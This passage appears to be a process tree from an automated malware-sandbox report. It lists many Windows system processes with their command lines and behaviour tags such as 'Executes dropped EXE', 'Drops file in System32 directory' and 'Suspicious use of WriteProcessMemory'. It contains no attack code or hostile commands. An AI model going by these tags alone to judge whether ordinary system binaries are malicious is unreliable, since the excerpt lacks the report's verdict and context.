  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 284 -NGENProcess 264 -Pipe 294 -Comment "NGen Worker Process"
  2⤵
  PID:2400
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 290 -NGENProcess 29c -Pipe 248 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  PID:1516
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 29c -NGENProcess 298 -Pipe 210 -Comment "NGen Worker Process"
  2⤵
  PID:2520
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 2ac -NGENProcess 288 -Pipe 278 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:3004
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 29c -NGENProcess 2a8 -Pipe 2a4 -Comment "NGen Worker Process"
  2⤵
  PID:1092
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 29c -NGENProcess 2ac -Pipe 2b0 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2364
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 2ac -NGENProcess 290 -Pipe 2a8 -Comment "NGen Worker Process"
  2⤵
  PID:2228
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 2c0 -NGENProcess 2b4 -Pipe 2bc -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2468
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 2b4 -NGENProcess 29c -Pipe 288 -Comment "NGen Worker Process"
  2⤵
  PID:2496
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 2c8 -NGENProcess 28c -Pipe 2c4 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2244
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 2c0 -NGENProcess 2cc -Pipe 2b4 -Comment "NGen Worker Process"
  2⤵
  PID:1604
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 2c0 -NGENProcess 2b8 -Pipe 28c -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2832
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 2b8 -NGENProcess 2a0 -Pipe 2cc -Comment "NGen Worker Process"
  2⤵
  PID:2740
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 2d4 -NGENProcess 290 -Pipe 2ac -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:1680
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 2b8 -NGENProcess 264 -Pipe 29c -Comment "NGen Worker Process"
  2⤵
  PID:1888
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 2d0 -NGENProcess 2d8 -Pipe 298 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2096
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 2d8 -NGENProcess 2d4 -Pipe 290 -Comment "NGen Worker Process"
  2⤵
  PID:1704
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 2e4 -NGENProcess 264 -Pipe 2c0 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2364
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e4 -InterruptEvent 264 -NGENProcess 2d0 -Pipe 2e0 -Comment "NGen Worker Process"
  2⤵
  PID:1780
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 2ec -NGENProcess 2d4 -Pipe 2b8 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2200
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 2d4 -NGENProcess 2e4 -Pipe 2e8 -Comment "NGen Worker Process"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2300
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 2f4 -NGENProcess 2d0 -Pipe 2d8 -Comment "NGen Worker Process"
  2⤵
  PID:2740
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 2f8 -NGENProcess 2f0 -Pipe 2dc -Comment "NGen Worker Process"
  2⤵
  PID:2876
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 2fc -NGENProcess 2e4 -Pipe 264 -Comment "NGen Worker Process"
  2⤵
  PID:1956
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 300 -NGENProcess 2f4 -Pipe 2d4 -Comment "NGen Worker Process"
  2⤵
  PID:1576
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 300 -InterruptEvent 2c8 -NGENProcess 2e4 -Pipe 2ec -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2072
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 2e4 -NGENProcess 2fc -Pipe 2f8 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:1624
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e4 -InterruptEvent 2fc -NGENProcess 2a0 -Pipe 2f4 -Comment "NGen Worker Process"
  2⤵
  PID:984
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 310 -InterruptEvent 304 -NGENProcess 314 -Pipe 2e4 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:1028
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 314 -NGENProcess 308 -Pipe 2a0 -Comment "NGen Worker Process"
  2⤵
  PID:2460
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 318 -NGENProcess 2fc -Pipe 2f0 -Comment "NGen Worker Process"
  2⤵
  PID:1492
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 318 -InterruptEvent 31c -NGENProcess 2d0 -Pipe 2c8 -Comment "NGen Worker Process"
  2⤵
  PID:1664
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 320 -InterruptEvent 314 -NGENProcess 324 -Pipe 318 -Comment "NGen Worker Process"
  2⤵
  PID:2096
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 310 -NGENProcess 2d0 -Pipe 300 -Comment "NGen Worker Process"
  2⤵
  PID:2464
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 310 -InterruptEvent 2d0 -NGENProcess 308 -Pipe 32c -Comment "NGen Worker Process"
  2⤵
  PID:836
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 30c -NGENProcess 328 -Pipe 304 -Comment "NGen Worker Process"
  2⤵
  PID:2076
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 330 -NGENProcess 314 -Pipe 2fc -Comment "NGen Worker Process"
  2⤵
  PID:1244
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 330 -InterruptEvent 320 -NGENProcess 308 -Pipe 324 -Comment "NGen Worker Process"
  2⤵
  PID:764
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 320 -InterruptEvent 31c -NGENProcess 108 -Pipe 328 -Comment "NGen Worker Process"
  2⤵
  PID:1592
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 31c -InterruptEvent 334 -NGENProcess 314 -Pipe 310 -Comment "NGen Worker Process"
  2⤵
  PID:2396
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 334 -InterruptEvent 338 -NGENProcess 308 -Pipe 2d0 -Comment "NGen Worker Process"
  2⤵
  PID:2520
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 338 -InterruptEvent 33c -NGENProcess 108 -Pipe 30c -Comment "NGen Worker Process"
  2⤵
  PID:2840
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 340 -NGENProcess 314 -Pipe 330 -Comment "NGen Worker Process"
  2⤵
  PID:3032
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 340 -InterruptEvent 344 -NGENProcess 308 -Pipe 320 -Comment "NGen Worker Process"
  2⤵
  PID:2876
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 344 -InterruptEvent 348 -NGENProcess 108 -Pipe 31c -Comment "NGen Worker Process"
  2⤵
  PID:1092
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 348 -InterruptEvent 34c -NGENProcess 314 -Pipe 334 -Comment "NGen Worker Process"
  2⤵
  PID:2496
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 34c -InterruptEvent 340 -NGENProcess 308 -Pipe 354 -Comment "NGen Worker Process"
  2⤵
  PID:1968
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 340 -InterruptEvent 338 -NGENProcess 350 -Pipe 33c -Comment "NGen Worker Process"
  2⤵
  PID:920
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 338 -InterruptEvent 358 -NGENProcess 314 -Pipe 10c -Comment "NGen Worker Process"
  2⤵
  PID:2516
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 358 -InterruptEvent 35c -NGENProcess 308 -Pipe 344 -Comment "NGen Worker Process"
  2⤵
  PID:324
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 35c -InterruptEvent 360 -NGENProcess 350 -Pipe 348 -Comment "NGen Worker Process"
  2⤵
  PID:2792
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 360 -InterruptEvent 364 -NGENProcess 314 -Pipe 34c -Comment "NGen Worker Process"
  2⤵
  PID:2608
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 364 -InterruptEvent 314 -NGENProcess 308 -Pipe 36c -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2952
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 338 -InterruptEvent 35c -NGENProcess 340 -Pipe 364 -Comment "NGen Worker Process"
  2⤵
  PID:2440
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 35c -InterruptEvent 108 -NGENProcess 308 -Pipe 350 -Comment "NGen Worker Process"
  2⤵
  PID:2884
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 108 -InterruptEvent 370 -NGENProcess 314 -Pipe 360 -Comment "NGen Worker Process"
  2⤵
  PID:920
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 370 -InterruptEvent 374 -NGENProcess 340 -Pipe 1a0 -Comment "NGen Worker Process"
  2⤵
  PID:1540
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 374 -InterruptEvent 378 -NGENProcess 308 -Pipe 368 -Comment "NGen Worker Process"
  2⤵
  PID:940
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 378 -InterruptEvent 37c -NGENProcess 314 -Pipe 338 -Comment "NGen Worker Process"
  2⤵
  PID:2632
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 37c -InterruptEvent 380 -NGENProcess 340 -Pipe 35c -Comment "NGen Worker Process"
  2⤵
  PID:1932
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 384 -InterruptEvent 378 -NGENProcess 388 -Pipe 37c -Comment "NGen Worker Process"
  2⤵
  PID:1680
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 378 -InterruptEvent 108 -NGENProcess 340 -Pipe 370 -Comment "NGen Worker Process"
  2⤵
  PID:2016
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 108 -InterruptEvent 38c -NGENProcess 380 -Pipe 358 -Comment "NGen Worker Process"
  2⤵
  PID:1536
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 38c -InterruptEvent 390 -NGENProcess 388 -Pipe 374 -Comment "NGen Worker Process"
  2⤵
  PID:2524
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 390 -InterruptEvent 394 -NGENProcess 340 -Pipe 308 -Comment "NGen Worker Process"
  2⤵
  PID:1808
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 394 -InterruptEvent 398 -NGENProcess 380 -Pipe 384 -Comment "NGen Worker Process"
  2⤵
  PID:1544
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 398 -InterruptEvent 39c -NGENProcess 388 -Pipe 374 -Comment "NGen Worker Process"
  2⤵
  PID:1780
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 39c -InterruptEvent 3a0 -NGENProcess 340 -Pipe 108 -Comment "NGen Worker Process"
  2⤵
  PID:896
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 3a4 -NGENProcess 380 -Pipe 38c -Comment "NGen Worker Process"
  2⤵
  PID:548
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3a4 -InterruptEvent 3a8 -NGENProcess 388 -Pipe 390 -Comment "NGen Worker Process"
  2⤵
  PID:2900
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3a8 -InterruptEvent 3ac -NGENProcess 340 -Pipe 394 -Comment "NGen Worker Process"
  2⤵
  PID:556
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 3b0 -NGENProcess 380 -Pipe 398 -Comment "NGen Worker Process"
  2⤵
  PID:3024
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 3b4 -NGENProcess 388 -Pipe 39c -Comment "NGen Worker Process"
  2⤵
  PID:2464
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b4 -InterruptEvent 3b8 -NGENProcess 340 -Pipe 3a0 -Comment "NGen Worker Process"
  2⤵
  PID:1708
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b8 -InterruptEvent 3bc -NGENProcess 380 -Pipe 3a4 -Comment "NGen Worker Process"
  2⤵
  PID:2940
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3bc -InterruptEvent 3c0 -NGENProcess 388 -Pipe 3a8 -Comment "NGen Worker Process"
  2⤵
  PID:1780
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b4 -InterruptEvent 3c4 -NGENProcess 3b8 -Pipe 3c0 -Comment "NGen Worker Process"
  2⤵
  PID:1608
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3c4 -InterruptEvent 3ac -NGENProcess 388 -Pipe 3b0 -Comment "NGen Worker Process"
  2⤵
  PID:2440
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 3cc -NGENProcess 3bc -Pipe 314 -Comment "NGen Worker Process"
  2⤵
  PID:2520
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3cc -InterruptEvent 3d0 -NGENProcess 3b8 -Pipe 3c8 -Comment "NGen Worker Process"
  2⤵
  PID:920
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3d4 -InterruptEvent 3ac -NGENProcess 3d8 -Pipe 3cc -Comment "NGen Worker Process"
  2⤵
  PID:3024
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 340 -NGENProcess 3b8 -Pipe 3b4 -Comment "NGen Worker Process"
  2⤵
  PID:2468
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3dc -InterruptEvent 340 -NGENProcess 3ac -Pipe 3d0 -Comment "NGen Worker Process"
  2⤵
  - Modifies data under HKEY_USERS
  PID:2432
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 340 -InterruptEvent 380 -NGENProcess 3b8 -Pipe 3c4 -Comment "NGen Worker Process"
  2⤵
  PID:2952

C:\Windows\ehome\ehRecvr.exe
C:\Windows\ehome\ehRecvr.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2188

C:\Windows\ehome\ehsched.exe
C:\Windows\ehome\ehsched.exe
1⤵
- Executes dropped EXE
PID:1040

C:\Windows\eHome\EhTray.exe
"C:\Windows\eHome\EhTray.exe" /nav:-2
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2068

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:2936

C:\Windows\system32\IEEtwCollector.exe
C:\Windows\system32\IEEtwCollector.exe /V
1⤵
- Executes dropped EXE
PID:896

C:\Windows\ehome\ehRec.exe
C:\Windows\ehome\ehRec.exe -Embedding
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE" /auditservice
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1612

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
PID:908

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:3008

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:2260

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2504

C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
1⤵
- Executes dropped EXE
PID:1500

C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
1⤵
- Executes dropped EXE
PID:928

C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
1⤵
- Executes dropped EXE
PID:1580

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Executes dropped EXE
PID:2992

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Executes dropped EXE
PID:1364

C:\Program Files\Windows Media Player\wmpnetwk.exe
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-39690363-730359138-1046745555-10001_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-39690363-730359138-1046745555-10001 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:1780
